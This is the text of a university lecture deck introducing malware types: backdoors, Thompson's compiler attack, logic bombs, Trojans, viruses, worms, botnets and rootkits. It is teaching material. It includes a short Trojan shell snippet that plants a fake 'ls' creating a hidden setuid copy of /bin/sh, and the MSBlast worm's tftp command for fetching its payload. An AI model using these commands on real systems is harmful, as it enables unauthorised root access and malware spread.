introduction to malware

Coming up: What is Malicious Software?

Introduction to MalwareDan FleckCS469 Security Engineering

Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop

111

What is Malicious Software?

Malicious Software (a.k.a. Malware)• Software designed to infiltrate or damage a computer system,

without the owner's informed consent -- http://en.wikipedia.org/wiki/Malware

• Examples:• Viruses, worms, Trojan horses, spyware, and other malicious and

unwanted software

• How about adware?

• Malware references the intent of the creator, rather than any particular features • DRM v.s. Rootkit (e.g., Sony CD rootkit)

2Coming up: Why should we care?

Source: Symantec Internet Threat Report 2012

2

http://en.wikipedia.org/wiki/Malware



Why should we care?




3

Why should we care?




4

Coming up: Taxonomy of Malicious Software

Why should we care?


55

Coming up: Trapdoor/Backdoor

Taxonomy of Malicious Software

66

Coming up: Thompson's Compiler

Trapdoor/Backdoor

• Secret entry point into a system• Specific user identifier or password that

circumvents normal security procedures.• Commonly used by developers• Could be included in a compiler.

• Lets see Thompson’s Compiler

77

Nov

embe

r 1, 2

004

Coming up: The Login Program

Slide #19-

8

Thompson's Compiler• Modify the compiler so that when it compiles

login , login accepts the user's correct password or a fixed password (the same one for all users)• Then modify the compiler again, so when it

compiles a new version of the compiler, the extra code to do the first step is automatically inserted• Recompile the compiler• Delete the source containing the modification

and put the undoctored source back

88

Coming up: The Compiler

login source correct compiler login executable

user password

login source doctored compiler login executable

magic passworduser password or

logged in

logged in

The Login Program

9

Nov

embe

r 1, 2

004

Coming up: Thompson’s Lesson

Slide #19-10

compiler source correct compiler compiler executable

login source

compiler source doctored compiler compiler executable

correct login executable

login source

rigged login executable

The Compiler

1010

Coming up: Logic Bomb

Thompson’s Lesson

Verifying the source code isn’t always enough!

1111

Coming up: Trojan Horse

Logic Bomb• Embedded in legitimate programs• Activated when specified conditions met• E.g., presence/absence of some file; Particular date/time or

particular user

• When triggered, typically damages system• Modify/delete files/disks

• Example: Disgruntled employee adds trigger that when employee’s salary record deleted from DB, all personnel records deleted also.

1212Can you think of other logic bombs?

Coming up: Trojan Horse Example: NetBus

Trojan HorseProgram with an expected and hidden effect • Appears normal/expected • hidden effect violates security

policy

User tricked into executing Trojan horse • Expects (and sees) expected

behavior • Hidden effect performed with

user’s authorization

Attackercat >/homes/victim/ls <<eof cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* eof

Victimls 1313

Coming up: Virus

Trojan Horse Example: NetBus

• Designed for Windows NT system• Victim uploads and installs this• Usually disguised as a game program, or in one

• Acts as a server, accepting and executing commands for remote administrator• This includes intercepting keystrokes and

mouse motions and sending them to attacker• Also allows attacker to upload, download files

1414

Coming up: Early Virus Reports

Virus

• Program that inserts itself into one or more files and performs some action• Insertion phase is inserting itself into file• Execution phase is performing some (possibly null) action

• Self-replicating code• Generally tries to remain undetected

• Pseudocode If spread condition thenFor target filesif not infected then alter to include virus Perform malicious actionExecute normal program (step done only by Trojan horses to remain hidden)

141515

Coming up: Virus Types

Early Virus Reports

• Brain (Pakistani) virus (1986)• Written for IBM PCs• Alters boot sectors of floppies, spreads to

other floppies

• MacMag Peace virus (1987)• Written for Macintosh• Prints “universal message of peace” on March

2, 1988 and deletes itself 1616


Virus TypesBoot Sector• Problem: How to ensure virus “carrier” executed?• Solution: Place in boot sector of disk• Run on any boot

• Propagate by altering boot disk creation• Less common with few boots off floppies

Executable• Malicious code placed at beginning of legitimate program (EXE or .COM• Runs when application run

15

Brain virus used this

1717

Coming up: Macro Virus Example

Virus Types

Macro Virus• Infected “executable” isn’t machine code• Relies on something “executed” inside

application data• Common example: Macros

• Otherwise similar properties to other viruses• Architecture-independent• Application-dependent

161818


Macro Virus Example

• Melissa• Infected Microsoft Word 97 and Word 98 documents• Windows and Macintosh systems

• Invoked when program opens infected file• Installs itself as “open” macro and copies itself into

Normal template• This way, infects any files that are opened in future

• Invokes mail program, sends itself to everyone in user’s address book

1919


Virus TypesArmored• Encrypt virus• Prevents “signature” to detect virus

Stealth• Conceal Infection• Trap read and disinfect• Let execute call infected file

Terminate and Stay Resident (TSR)• Stays active in memory after application complete• Allows infection of previously unknown files• Trap calls that execute a program 17

• Request for file length: return length of uninfected file

• Request to open file: temporarily disinfect file, and reinfect on closing

• Request to load file for execution: load infected file

2020

Coming up: Polymorphic Example

Virus TypesPolymorphic• A virus that changes its form each time it inserts itself into another

program

• Idea is to prevent signature detection by changing the “signature” or instructions used for deciphering routine

• At instruction level: substitute instructions

• At algorithm level: different algorithms to achieve the same purpose

• Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine) 172121

Coming up: Worm

Polymorphic Example

• These are different instructions (with different bit patterns) but have the same effect:• add 0 to register• subtract 0 from register• xor 0 with register• no-op

• Polymorphic virus would pick randomly from among these instructions

2222

Coming up: Work Propagation

Worm• Runs independently • Does not require a host program

• Propagates a fully working version of itself to other machines

• Carries a payload performing hidden tasks• Backdoors, spam relays, DDoS agents; …

• Phases• Probing Exploitation ReplicationPayload

1823So, how is a virus different from a worm?

23

Coming up: MSBlast Worm (Aug 2003)

Work Propagation

192424

Coming up: Zombie

MSBlast Worm (Aug 2003)1. Exploits target on port 135/TCP

3. Connects to target on port 4444/TCP

5. Creates “TFTP Server” on port 696. Sends “TFTP” command to shell

8. Sends “START msblast.exe” command

10. Closes connection

2. Binds svchost.exe to port 4444/TCP via injected code

4. Creates shell “cmd.exe” and binds it to port 4444/TCP

Runs TFTP command: teleports msblast.exe file

9. Runs worm on target

11. Shell closes

tftp –l 192.168.0.1 GET msblast.exe

TCP protocal: Direction: InboundLocal end point ports: 135Application: ANYRemote End Point: ANY/ANYRule valid: ALWAYSAction: DENY

Infected New Victim

202525

Coming up: Zombie

Zombie• Secretly takes over another networked computer by exploiting

software flows• Builds the compromised computers into a zombie network or

botnet• Uses it to indirectly launch attacks• E.g., DDoS

2126

Lets see how we create zombies..

26

Coming up: Zombie: Steps - 1

Lets see how we create zombies..

Computer27


Zombie: Steps - 1

Attacker

Unsecured Computers

Attacker scans Internet for unsecured systems that can be compromised

1

222728


Zombie: Steps - 2

Attacker

Unsecured Computers

Attacker secretly installs zombie agentprogram, turning unsecured computers into zombies

2

232829


Zombie: Steps - 3

Attacker

Zombies

Zombie agents “phone home” and connect to a master server

3

Master Server 242930


Zombie: Steps - 4

Attacker

Zombies

Attacker sends commands to Maser Server to launch a DDoS attack against a targeted system

4

Master Server 253031


Zombie: Steps - 5

Attacker

Zombies

Master server sends signal to zombies to launch attack on targeted system

5

Master Server

TARGET

263132

Coming up: Rootkit

Zombie: Steps - 6

Attacker

Zombies

Target system is overwhelmed by zombie requests denying requests from normal users

6

Master Server

TARGET

User

Requ

est

Deni

ed

273233

Coming up: Linux RootKit III

Rootkit

• “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer”

• Goals:• Hide malicious resources (e.g., processes, files,

registry keys, open ports, etc.)• Provide hidden backdoor access

283334

Coming up: Rootkit

ls Trojaned! Hide filesdu Trojaned! Hide filesifconfig Trojaned! Hide sniffingnetstat Trojaned! Hide connectionschfn Trojaned! User->r00tchsh Trojaned! User->r00tinetd Trojaned! Remote accesslogin Trojaned! Remote accesspasswd Trojaned! User->r00tps Trojaned! Hide processestop Trojaned! Hide processesrshd Trojaned! Remote accesssyslogd Trojaned! Hide logslinsniffer Packet sniffer!fix File fixer!z2 Zap2 utmp/wtmp/lastlog eraser!wted wtmp/utmp editor!lled lastlog editor!bindshell port/shell type daemon!tcpd Trojaned! Hide connections, avoid denies

Linux RootKit III

293435

Coming up: Rootkit Classification

Rootkit

• Simple rootkits:• Modify user programs (ls, ps)• Detectable by tools like Tripwire

• Sophisticated rootkits:• Modify the kernel itself• Hard to detect from userland

303536

Coming up: Rootkit Classification

Rootkit Classification

31Replace apps Add code to all apps

See: http://www.phrack.org/issu

es.html?issue=62&id=12

Replace/modify kernel modules

3637

Coming up: Lessons

Rootkit Classification

32

Run entire OS in a virtual machine

3738

End of presentation

Lessons• Malware comes in many types and styles

• It’s not going away and will always hit new platforms as they come out

• We’ll need multiple approaches to defend against them.

38Next up: Malware Defense!

3839

introduction to malware

Documents

compiler program

undoctored compiler

login programslide

correct compiler executable

correct login executable

compiler proper ccom

source code isnt

taxonomy of malicious